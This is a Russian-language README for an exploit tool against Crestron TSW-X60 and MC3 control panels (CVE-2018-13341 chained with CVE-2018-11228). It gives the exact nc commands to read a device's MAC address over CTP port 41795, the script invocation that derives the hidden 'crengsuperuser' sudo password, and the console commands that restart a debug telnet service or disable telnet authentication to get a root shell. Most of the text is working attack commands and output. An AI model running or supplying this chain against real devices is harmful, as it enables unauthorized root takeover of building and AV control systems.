
Инструмент для эксплуатации CVE-2018-13341 и восстановления скрытого пароля учетной записи на устройствах Crestron.
Основано на открытии Ricky Lawshae для устройств Crestron TSW-X60 и MC3. Этот инструмент предназначен для эксплуатации CVE-2018-13341. Используя MAC-адрес целевого устройства, вы можете восстановить пароль скрытой учётной записи "crengsuperuser", которая имеет повышенные привилегии и позволяет выполнять команды SUDO.
На устройствах Crestron TSW-X60 с версией ниже 2.001.0037.001 и MC3 с версией ниже 1.502.0047.00 пароли для специальных учётных записей sudo могут быть вычислены с использованием информации, доступной пользователям с обычными привилегиями. Злоумышленники могут расшифровать эти пароли, что позволит им выполнять скрытые вызовы API и выйти из изолированной среды консоли CTP с повышенными привилегиями.
Протокол Crestron Toolbox (CTP) доступен через порт 41795 на устройстве TSW-XX60. Затем вы можете использовать команду estat для получения MAC-адреса устройства:
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Этот инструмент требует модуль cryptography.
$ pip3 install cryptography
ИЛИ
$ pip3 install -r requirements.txt
usage: crestron_getsudopwd.py [-h] [-m MAC]
Tool to generate Crestron hidden accounts passwords
optional arguments:
-h, --help show this help message and exit
-m MAC, --mac MAC Target MAC address (w/o colons or dots)
# Example
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t
CVE-2018-11228 позволяет неавторизованным пользователям выполнить удалённое выполнение команд (RCE) через службу Bash Shell в протоколе Crestron Terminal (CTP). После получения пароля скрытой учётной записи "crengsuperuser" вы можете получить доступ root на базовом Linux-устройстве.
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Затем в новом сеансе оболочки вы можете получить доступ root к устройству.
$ telnet w.x.y.z
bash-3.2# whoami
root
Примечание: Этот пример предназначен для устройств TSW. Для устройств MC3 процесс немного отличается. Вам нужно использовать следующие команды для включения оболочки:
SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0, затемSUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:
Вот несколько интересных ресурсов, связанных с этой уязвимостью: